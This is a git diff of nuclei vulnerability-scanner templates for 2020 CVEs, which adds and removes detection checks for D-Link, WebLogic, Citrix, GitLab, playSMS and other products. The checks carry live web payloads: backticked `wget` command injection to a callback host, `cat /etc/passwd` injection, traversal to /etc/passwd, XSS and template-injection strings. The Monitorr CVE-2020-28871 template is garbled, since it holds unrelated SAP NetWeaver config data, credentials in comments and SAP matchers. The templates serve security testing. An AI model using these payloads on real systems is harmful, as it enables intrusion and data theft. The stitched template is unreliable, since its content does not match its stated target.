rename to nuclei-templates/CVE-2020/cve-2020-24550.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-24609.yaml b/nuclei-templates/CVE-2020/cve-2020-24609.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-24609.yaml rename to nuclei-templates/CVE-2020/cve-2020-24609.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-24765.yaml b/nuclei-templates/CVE-2020/cve-2020-24765.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-24765.yaml rename to nuclei-templates/CVE-2020/cve-2020-24765.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-25506.yaml b/nuclei-templates/CVE-2020/cve-2020-25506.yaml new file mode 100644 index 0000000000..6ce8094ff6 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-25506.yaml @@ -0,0 +1,36 @@ +id: CVE-2020-25506 + +info: + name: D-Link DNS-320 - Unauthenticated Remote Code Execution + author: gy741 + severity: critical + description: The exploit targets a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution. + reference: + - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 + - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ + tags: cve,cve2020,dlink,rce,oast,mirai + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25506 + cwe-id: CWE-78 + +requests: + - raw: + - | + POST /cgi-bin/system_mgr.cgi? HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` + + - | + POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/nuclei-templates/CVE-2020/cve-2020-2551.yaml b/nuclei-templates/CVE-2020/cve-2020-2551.yaml new file mode 100644 index 0000000000..47f08247f8 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-2551.yaml @@ -0,0 +1,50 @@ +id: CVE-2020-2551 + +info: + name: Unauthenticated Oracle WebLogic Server RCE + author: dwisiswant0 + severity: critical + description: | + This template supports the detection part only. See references. + + Vulnerability in the Oracle WebLogic Server product of + Oracle Fusion Middleware (component: WLS Core Components). + Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, + 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability + allows unauthenticated attacker with network access via IIOP + to compromise Oracle WebLogic Server. + + Successful attacks of this vulnerability can result + in takeover of Oracle WebLogic Server. + + reference: https://github.com/hktalent/CVE-2020-2551 + tags: cve,cve2020,oracle,weblogic,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-2551 + +requests: + - method: GET + path: + - "{{BaseURL}}/console/login/LoginForm.jsp" + + matchers-condition: and + matchers: + - type: word + words: + - "10.3.6.0" + - "12.1.3.0" + - "12.2.1.3" + - "12.2.1.4" + condition: or + part: body + + - type: word + words: + - "WebLogic" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-25864.yaml b/nuclei-templates/CVE-2020/cve-2020-25864.yaml deleted file mode 100644 index c0f536ddbc..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-25864.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2020-25864 - -info: - name: HashiCorp Consul and Consul Enterprise up to version 1.9.4 key-value (KV) raw mode is vulnerable to cross-site scripting - severity: medium - author: c-sh0 - reference: - - https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368 - - https://nvd.nist.gov/vuln/detail/CVE-2020-25864 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-25864 - cwe-id: CWE-79 - tags: cve,cve2020,consul,xss - -requests: - - raw: - - | - PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1 - Host: {{Hostname}} - - - - - | - GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" - - - type: word - part: body_2 - words: - - "" \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-26073.yaml b/nuclei-templates/CVE-2020/cve-2020-26073.yaml deleted file mode 100644 index cb775c813c..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-26073.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: CVE-2020-26073 -info: - name: Cisco SD-WAN vManage Software Directory Traversal - author: madrobot - severity: high - description: | - A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information. - reference: - - https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html - tags: cve,cve2020,cisco,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-26413.yaml b/nuclei-templates/CVE-2020/cve-2020-26413.yaml deleted file mode 100644 index 8aeff846b2..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-26413.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2020-26413 - -info: - name: Gitlab User enumeration via Graphql API - author: _0xf4n9x_,pikpikcu - severity: medium - description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible. - reference: - - https://gitlab.com/gitlab-org/gitlab/-/issues/244275 - - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json - - https://nvd.nist.gov/vuln/detail/CVE-2020-26413 - tags: cve,cve2020,gitlab,exposure,enum,graphql - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 - cve-id: CVE-2020-26413 - cwe-id: CWE-200 - -requests: - - raw: - - | - POST /api/graphql HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - { - "query": "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }", - "variables": null, - "operationName": null - } - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"username":' - - '"avatarUrl":' - - '"node":' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: json - part: body - json: - - '.data.users.edges[].node.email' diff --git a/nuclei-templates/CVE-2020/cve-2020-26948.yaml b/nuclei-templates/CVE-2020/cve-2020-26948.yaml new file mode 100644 index 0000000000..6367027877 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-26948.yaml @@ -0,0 +1,32 @@ +id: CVE-2020-26948 + +info: + name: Emby Server SSRF + author: dwisiswant0 + severity: critical + reference: https://github.com/btnz-k/emby_ssrf + description: Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter. + tags: cve,cve2020,emby,jellyfin,ssrf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26948 + cwe-id: CWE-918 + +requests: + - method: GET + path: + - "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net" + matchers-condition: and + matchers: + - type: status + status: + - 500 + - type: word + words: + - "Name or service not known" + part: body + - type: word + words: + - "text/plain" + part: header diff --git a/nuclei-templates/CVE-2020/cve-2020-27191.yaml b/nuclei-templates/CVE-2020/cve-2020-27191.yaml deleted file mode 100644 index 82266438a6..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-27191.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2020-27191 -info: - name: LionWiki 3.2.11 - LFI - author: 0x_Akoko - severity: high - description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted string in the index.php f1 variable, aka Local File Inclusion. - reference: - - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi - - http://lionwiki.0o.cz/index.php?page=Main+page - - https://www.cvedetails.com/cve/CVE-2020-27191 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-27191 - cwe-id: CWE-22 - tags: cve,cve2020,lionwiki,lfi,oss - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-27467.yaml b/nuclei-templates/CVE-2020/cve-2020-27467.yaml deleted file mode 100644 index efea3a97df..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-27467.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2020-27467 -info: - name: Processwire CMS < 2.7.1 - Directory Traversal - author: 0x_Akoko - severity: high - description: Local File Inclusion in Processwire CMS < 2.7.1 allows to retrieve arbitrary files via the download parameter to index.php By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system. - reference: - - https://github.com/Y1LD1R1M-1337/LFI-ProcessWire - - https://processwire.com/ - - https://www.cvedetails.com/cve/CVE-2020-27467 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-27467 - cwe-id: CWE-22 - tags: cve,cve2020,processwire,lfi,cms,oss - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?download=/etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-27866.yaml b/nuclei-templates/CVE-2020/cve-2020-27866.yaml deleted file mode 100644 index 81151b66a4..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-27866.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2020-27866 - -info: - name: NETGEAR Authentication Bypass vulnerability - author: gy741 - severity: high - description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. - tags: cve,cve2020,netgear,auth-bypass - reference: - - https://wzt.ac.cn/2021/01/13/AC2400_vuln/ - - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866 - - https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers - classification: - cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2020-27866 - cwe-id: CWE-288 - -requests: - - raw: - - | - GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept: */* - Accept-Language: en - Connection: close - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'Debug Enable!' - part: body \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-27982.yaml b/nuclei-templates/CVE-2020/cve-2020-27982.yaml deleted file mode 100644 index f46b932a44..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-27982.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2020-27982 -info: - name: IceWarp WebMail Reflected XSS - author: madrobot - severity: medium - description: IceWarp 11.4.5.0 allows XSS via the language parameter. - reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html - tags: cve,cve2020,xss,icewarp - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-27982 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "" - part: body - - - type: word - words: - - "text/html" - part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-27986.yaml b/nuclei-templates/CVE-2020/cve-2020-27986.yaml new file mode 100644 index 0000000000..d33b9d2de3 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-27986.yaml @@ -0,0 +1,36 @@ +id: CVE-2020-27986 + +info: + name: SonarQube unauth + author: pikpikcu + severity: high + description: | + SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, + SVN, and GitLab credentials via the api/settings/values URI. + NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." + reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ + tags: cve,cve2020,sonarqube + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-27986 + cwe-id: CWE-306,CWE-312 + +requests: + - method: GET + path: + - "{{BaseURL}}/api/settings/values" + + matchers-condition: and + matchers: + - type: word + words: + - email.smtp_host.secured + - email.smtp_password.secured + - email.smtp_port.secured + - email.smtp_username.secured + part: body + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-28871.yaml b/nuclei-templates/CVE-2020/cve-2020-28871.yaml new file mode 100644 index 0000000000..8520809f13 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-28871.yaml @@ -0,0 +1,49 @@ +id: CVE-2020-28871 + +info: + name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution + author: gy741 + severity: critical + description: This template detects a remote code execution (RCE) vulnerability in Monitorr 1.7.6m. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-28871 + - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ + - https://www.exploit-db.com/exploits/48980 + tags: cve,cve2020,monitorr,rce,oast + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-28871 + cwe-id: CWE-434 + +requests: + - raw: + - | + POST /assets/php/upload.php HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Accept: text/plain, */*; q=0.01 + Connection: close + Accept-Language: en-US,en;q=0.5 + X-Requested-With: XMLHttpRequest + Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745 + Origin: http://{{Hostname}} + Referer: http://{{Hostname}} + + -----------------------------31046105003900160576454225745 + Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php" + Content-Type: image/gif + + GIF89a213213123sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc + CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA== + userDetails + + # userName - sapRpoc6351 + # password - Secure!PwD8890 + + matchers-condition: and + matchers: + - type: word + words: + - "CTCWebServiceSi" + - "SOAP-ENV" + part: body + condition: and + + - type: status + status: + - 200 + + - type: word + words: + - "text/xml" + - "SAP NetWeaver Application Server" + part: header diff --git a/nuclei-templates/CVE-2020/cve-2020-7209.yaml b/nuclei-templates/CVE-2020/cve-2020-7209.yaml deleted file mode 100644 index ddd44f6016..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-7209.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2020-7209 - -info: - name: LinuxKI Toolset 6.01 Remote Command Execution - author: dwisiswant0 - severity: critical - tags: cve,cve2020,rce - description: LinuxKI v6.0-1 and earlier are vulnerable to a remote code execution. This is resolved in release 6.0-2. - reference: - - http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html - - http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html - - https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2 - - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - - https://www.hpe.com/us/en/home.html # vendor homepage - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-7209 - -requests: - - method: GET - path: - - "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/nuclei-templates/CVE-2020/CVE-2020-7246.yaml b/nuclei-templates/CVE-2020/cve-2020-7246.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-7246.yaml rename to nuclei-templates/CVE-2020/cve-2020-7246.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-7318.yaml b/nuclei-templates/CVE-2020/cve-2020-7318.yaml deleted file mode 100644 index 5d994c8781..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-7318.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2020-7318 - -info: - name: McAfee ePolicy Orchestrator Reflected XSS - author: dwisiswant0 - severity: medium - description: | - Cross-Site Scripting vulnerability in McAfee ePolicy Orchestrator (ePO) - prior to 5.10.9 Update 9 allows administrators to inject arbitrary web - script or HTML via multiple parameters where the administrator's entries - were not correctly sanitized. - - reference: - - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ - tags: cve,cve2020,xss,mcafee - classification: - cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.30 - cve-id: CVE-2020-7318 - cwe-id: CWE-79 - -requests: - - raw: - - | - GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1 - Host: {{Hostname}} - Connection: close - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "text/html" - part: header - - type: word - words: - - "Policy Name" - - "'\">" - condition: and - part: body diff --git a/nuclei-templates/CVE-2020/CVE-2020-8163.yaml b/nuclei-templates/CVE-2020/cve-2020-8163.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-8163.yaml rename to nuclei-templates/CVE-2020/cve-2020-8163.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-8191.yaml b/nuclei-templates/CVE-2020/cve-2020-8191.yaml new file mode 100644 index 0000000000..850e1e43ea --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-8191.yaml @@ -0,0 +1,41 @@ +id: CVE-2020-8191 + +info: + name: Citrix ADC & NetScaler Gateway Reflected XSS + author: dwisiswant0 + severity: medium + tags: cve,cve2020,citrix,xss + reference: https://support.citrix.com/article/CTX276688 + description: | + Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS). + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8191 + cwe-id: CWE-79 + +requests: + - raw: + - | + POST /menu/stapp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + X-NITRO-USER: xpyZxwy6 + + sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-8194.yaml b/nuclei-templates/CVE-2020/cve-2020-8194.yaml new file mode 100644 index 0000000000..70af4732d1 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-8194.yaml @@ -0,0 +1,37 @@ +id: CVE-2020-8194 + +info: + name: Citrix ADC & NetScaler Gateway Reflected Code Injection + author: dwisiswant0 + severity: medium + tags: cve,cve2020,citrix + description: Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download. + reference: https://support.citrix.com/article/CTX276688 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2020-8194 + cwe-id: CWE-94 + +requests: + - raw: + - | + GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1 + Host: {{Hostname}} + Cookie: startupapp=st + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + words: + - "application/x-java-jnlp-file" + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-8515.yaml b/nuclei-templates/CVE-2020/cve-2020-8515.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-8515.yaml rename to nuclei-templates/CVE-2020/cve-2020-8515.yaml diff --git a/nuclei-templates/CVE-2020/CVE-2020-8641.yaml b/nuclei-templates/CVE-2020/cve-2020-8641.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-8641.yaml rename to nuclei-templates/CVE-2020/cve-2020-8641.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-8644.yaml b/nuclei-templates/CVE-2020/cve-2020-8644.yaml new file mode 100644 index 0000000000..aae9417521 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-8644.yaml @@ -0,0 +1,68 @@ +id: CVE-2020-8644 + +info: + name: playSMS <1.4.3 - Remote Code Execution + author: dbrwsky + severity: critical + description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system. + remediation: | + Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability. + reference: + - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/ + - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-8644 + - http://packetstormsecurity.com/files/157106/PlaySMS-index.php-Unauthenticated-Template-Injection-Code-Execution.html + - https://forum.playsms.org/t/playsms-1-4-3-has-been-released/2704 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-8644 + cwe-id: CWE-94 + epss-score: 0.96028 + epss-percentile: 0.99356 + cpe: cpe:2.3:a:playsms:playsms:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: playsms + product: playsms + tags: cve,cve2020,unauth,kev,packetstorm,ssti,playsms,rce + +http: + - raw: + - | + GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + - | + POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password= + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '4468-0202-EVC' + + - type: status + status: + - 200 + + extractors: + - type: xpath + name: csrf + internal: true + xpath: + - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input + attribute: value + part: body +# digest: 4a0a00473045022100de0fd4f3f3ad0fb96410bfb6090044c9b207a545e58487ddd0511778356e78c702202963c19d8dd8b9609b66bad92c7de0ffbe0fb371c60ada6d7cc14bdf04c0a9de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-8654.yaml b/nuclei-templates/CVE-2020/cve-2020-8654.yaml deleted file mode 100644 index 9f41122e5c..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-8654.yaml +++ /dev/null @@ -1,60 +0,0 @@ -id: CVE-2020-8654 - -info: - name: EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution - author: praetorian-thendrickson - severity: high - description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465. - impact: | - Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary SQL queries or remote code on the affected system. - remediation: | - Upgrade to a patched version of EyesOfNetwork or apply the necessary security patches to mitigate the vulnerabilities. - reference: - - https://github.com/h4knet/eonrce - - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb - - https://github.com/EyesOfNetworkCommunity/eonweb/issues/50 - - https://nvd.nist.gov/vuln/detail/CVE-2020-8654 - - https://github.com/ARPSyndicate/cvemon - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2020-8654 - cwe-id: CWE-78 - epss-score: 0.04987 - epss-percentile: 0.92656 - cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: eyesofnetwork - product: eyesofnetwork - tags: 